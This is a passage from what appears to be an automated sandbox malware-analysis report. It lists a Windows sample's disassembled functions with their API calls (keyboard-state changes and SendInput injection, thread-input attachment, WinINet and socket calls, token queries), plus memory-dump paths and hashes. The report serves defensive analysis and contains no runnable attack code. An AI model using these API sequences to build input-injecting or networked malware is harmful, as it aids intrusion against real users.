                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 5c803a4939c9a5e955e1df100f9e8b53a9273554d0eebf670e497e2e313482f3
                                                              • Instruction ID: c03163f8f84ceb07a2c5708aa84e24d695e430244603bd696b48aec6276afde7
                                                              • Opcode Fuzzy Hash: 5c803a4939c9a5e955e1df100f9e8b53a9273554d0eebf670e497e2e313482f3
                                                              • Instruction Fuzzy Hash: CA41EA71A006486FDF15EF65D955FEE7BB9AF44710F000019F905A3282DB749A46CB61
                                                              Function 00AF390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AF3966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AF3982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AF39EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AF3A4D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 5481d0fa5f3fdcb25c83b4efb221b697b08122087c648d810a074f50067a3895
                                                              • Instruction ID: 18868372fcf60d2dc9514bed63823d86e073a623c8e141f73ee577e2cbce4160
                                                              • Opcode Fuzzy Hash: 5481d0fa5f3fdcb25c83b4efb221b697b08122087c648d810a074f50067a3895
                                                              • Instruction Fuzzy Hash: 59413772A0020CAAEF309BE5C855BFDBBB9AB55310F14011AF6C1972C1CBF58E84D761
                                                              Function 00B1B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B1B5D1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: df6fa615a9ef3574029d618cf7ffbf0abb580f78ba118720eb537f368cd9b63d
                                                              • Instruction ID: 5df48193f93f52b8ca9a13aeb6d1e8c83cfcc2f46872929332784c9b647c3eb8
                                                              • Opcode Fuzzy Hash: df6fa615a9ef3574029d618cf7ffbf0abb580f78ba118720eb537f368cd9b63d
                                                              • Instruction Fuzzy Hash: D731AD74601208ABEF209F18CC95FECB7E6EB26350FA44585FA51D62E1CB30E9D08B61
                                                              Function 00B1D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 00B1D807
                                                              • GetWindowRect.USER32(?,?), ref: 00B1D87D
                                                              • PtInRect.USER32(?,?,00B1ED5A), ref: 00B1D88D
                                                              • MessageBeep.USER32(00000000), ref: 00B1D8FE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 94192861d77e18905ba289b2074eda00c415be09ccae3bfe03c993394f22c9cf
                                                              • Instruction ID: 00bb95c7ba6b6c3e4dc1a2ae6d15f29e791c7b9958d94540d0db2e6f100575dc
                                                              • Opcode Fuzzy Hash: 94192861d77e18905ba289b2074eda00c415be09ccae3bfe03c993394f22c9cf
                                                              • Instruction Fuzzy Hash: 9B417974A00218DFCB11DF58D884BE97BF5FB48315F9885E9E8189B2A0D730E981CB50
                                                              Function 00AF3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00AF3AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AF3AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AF3B34
                                                              • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00AF3B92
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: eafadcd83bfddae396d61ab3205bbb67c4334fa920fdfc36f42d58df658ebf71
                                                              • Instruction ID: ebbfc30805dbdaa8fd70b80e718b737e257f421df52bd4ae7730710ecab03af2
                                                              • Opcode Fuzzy Hash: eafadcd83bfddae396d61ab3205bbb67c4334fa920fdfc36f42d58df658ebf71
                                                              • Instruction Fuzzy Hash: 59316532A0025CAEEF319BE4C829BFEBBB99B55310F14025AF682972D1C7748F45C761
                                                              Function 00AE4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AE4038
                                                              • __isleadbyte_l.LIBCMT ref: 00AE4066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AE4094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AE40CA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 3c3a4cb058e5eac7b5f477d7fb081263fb3137d7f60f91718fb7a13887415e83
                                                              • Instruction ID: 74eeecca6f0bd363002f767a5ced5539f69e8f930d40b33061b9501e9903b892
                                                              • Opcode Fuzzy Hash: 3c3a4cb058e5eac7b5f477d7fb081263fb3137d7f60f91718fb7a13887415e83
                                                              • Instruction Fuzzy Hash: 1931B031600286EFDF219F76C844BBA7BB9BF48320F154439E6658B1A1E735E890DB90
                                                              Function 00B17CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00B17CB9
                                                                • Part of subcall function 00AF5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AF5F6F
                                                                • Part of subcall function 00AF5F55: GetCurrentThreadId.KERNEL32 ref: 00AF5F76
                                                                • Part of subcall function 00AF5F55: AttachThreadInput.USER32(00000000,?,00AF781F), ref: 00AF5F7D
                                                              • GetCaretPos.USER32(?), ref: 00B17CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00B17D03
                                                              • GetForegroundWindow.USER32 ref: 00B17D09
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 2e19acefa457c28b7675b986a073cd41a349a5a7a3ff0faec92e1d95edb1f0da
                                                              • Instruction ID: 65a31e4e4b47b7d51bfcbfe54076dfad0b6dbcbf15b42de683fa18e650971554
                                                              • Opcode Fuzzy Hash: 2e19acefa457c28b7675b986a073cd41a349a5a7a3ff0faec92e1d95edb1f0da
                                                              • Instruction Fuzzy Hash: 15311E71D00108AFDB10EFA9D985DEFBBF9EF58314B11846AF915E7211DA319E058BA0
                                                              Function 00B1F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • GetCursorPos.USER32(?), ref: 00B1F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B2E4C0,?,?,?,?,?), ref: 00B1F226
                                                              • GetCursorPos.USER32(?), ref: 00B1F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B2E4C0,?,?,?), ref: 00B1F2A6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 855bf2fb9c6e2c410b926e6d0c4ab81867667a38ba32991fbe92811255210f37
                                                              • Instruction ID: ff17fefdabb21bc1c5c98df221d09b7056f25af5aa6ba95d6ff1af678b125601
                                                              • Opcode Fuzzy Hash: 855bf2fb9c6e2c410b926e6d0c4ab81867667a38ba32991fbe92811255210f37
                                                              • Instruction Fuzzy Hash: 2A21B139500028AFCB258F98D859EFE7BF5FF0A710F5480A9F9094B2A5D7319D90DBA0
                                                              Function 00B0431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B04358
                                                                • Part of subcall function 00B043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B04401
                                                                • Part of subcall function 00B043E2: InternetCloseHandle.WININET(00000000), ref: 00B0449E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 1182b834f0721ea57d84c86c9ed25bb7f925543212e6d5da27020b4a10467eb5
                                                              • Instruction ID: 33e01fd87cfc9577f8fadc459b6dcf2ffb185b692c768cbfc5ccfeacdd0cde64
                                                              • Opcode Fuzzy Hash: 1182b834f0721ea57d84c86c9ed25bb7f925543212e6d5da27020b4a10467eb5
                                                              • Instruction Fuzzy Hash: DE21D1B5200A01BBEB129F60EC41FBBBBE9FF44710F10506AFB1597690DB71A8209B94
                                                              Function 00B18A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B18AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B18AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B18ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B18ADC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: d275d06d79c9314788ae2f271f925738397efdae3351140fac41f200d8ff4f24
                                                              • Instruction ID: 490bf93519c255082ce774d361af49a8ac17d8f0df7a5da548af132a040c73fa
                                                              • Opcode Fuzzy Hash: d275d06d79c9314788ae2f271f925738397efdae3351140fac41f200d8ff4f24
                                                              • Instruction Fuzzy Hash: B2119731215510AFDB04AB28DD05FAA77ADBF85320F28815AF926C72A2CF60AC408B90
                                                              Function 00B08A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00B08AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00B08AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00B08AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08B16
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 6b8b88a8467385997d368d197f97f6deef8e3f5847cfed9ef9684d50fc48bb5e
                                                              • Instruction ID: a2513c1c8950ca7d284fdfec25e49faf9c29d19664ea61a7ba30116e3f58aa45
                                                              • Opcode Fuzzy Hash: 6b8b88a8467385997d368d197f97f6deef8e3f5847cfed9ef9684d50fc48bb5e
                                                              • Instruction Fuzzy Hash: 85216372A001249FC7219F69D985A9EBBECEF49350F1081AAF849D7291DF749E418F90
                                                              Function 00AF0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?), ref: 00AF1E77
                                                                • Part of subcall function 00AF1E68: lstrcpyW.KERNEL32(00000000,?,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF1E9D
                                                                • Part of subcall function 00AF1E68: lstrcmpiW.KERNEL32(00000000,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?), ref: 00AF1ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: a36dbf699c974804e60d3eea389c99fea0e1aa36bd296707701cb562976f95ca
                                                              • Instruction ID: ac7064cc11690e1e6d3ab3df06c59131965b312e28326ed3bb52ba75f7ab6705
                                                              • Opcode Fuzzy Hash: a36dbf699c974804e60d3eea389c99fea0e1aa36bd296707701cb562976f95ca
                                                              • Instruction Fuzzy Hash: 7B119036200309AFDB25AF74DC45E7A77A9FF45354B90406AFA06CB2A5EB719850C7A0
                                                              Function 00AE2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00AE2FB5
                                                                • Part of subcall function 00AD395C: __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD395C: __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 39f1a547b9e404448f253561c3c471a3e1ac64448c9b4ca84e53da5d0ed04f6a
                                                              • Instruction ID: 18631fbddc212ca031a718f5768f59fee4abed1eba71dcf195f2cdea7b10f6d3
                                                              • Opcode Fuzzy Hash: 39f1a547b9e404448f253561c3c471a3e1ac64448c9b4ca84e53da5d0ed04f6a
                                                              • Instruction Fuzzy Hash: 4E110A32419252AFDF313B75AD1976E3BA8AF40360F204826F80A97251EF30CD508B90
                                                              Function 00AF058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AF05AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AF05C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AF05DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00AF0632
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: 0fb96bb34cec243a588f97b6217d7ea02769a61c205bba82571ebd1b6f6e655f
                                                              • Instruction ID: c4e92f4b14a74158f1a2a254f88d7807ca8ec2f34a5ebb270e5acc221e139264
                                                              • Opcode Fuzzy Hash: 0fb96bb34cec243a588f97b6217d7ea02769a61c205bba82571ebd1b6f6e655f
                                                              • Instruction Fuzzy Hash: A621597190020DAFDB608FD5ED88EEABBB8EB40700F108469B616D6151EBB0EA559B50
                                                              Function 00AF6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AF6733
                                                              • _memset.LIBCMT ref: 00AF6754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AF67A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AF67AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: 06290ba5881e0e081f43f1796d5c3495f41a5130d854c6594a50a18a7587a609
                                                              • Instruction ID: e7805fbb520efc53cfe9ab246e9cfb4b64e4ff9357997f20c4ed446352b8a1b0
                                                              • Opcode Fuzzy Hash: 06290ba5881e0e081f43f1796d5c3495f41a5130d854c6594a50a18a7587a609
                                                              • Instruction Fuzzy Hash: 3B110A71901228BAE7306BA5AC4DFAFBABCEF44724F10419AF505E71C0D6704E808B64
                                                              Function 00AEB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AEAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AEAA79
                                                                • Part of subcall function 00AEAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AEAA83
                                                                • Part of subcall function 00AEAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AEAA92
                                                                • Part of subcall function 00AEAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AEAA99
                                                                • Part of subcall function 00AEAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AEAAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,00AEADE4,?,?), ref: 00AEB21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AEB227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEB22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 00AEB247
                                                              Memory Dump Source
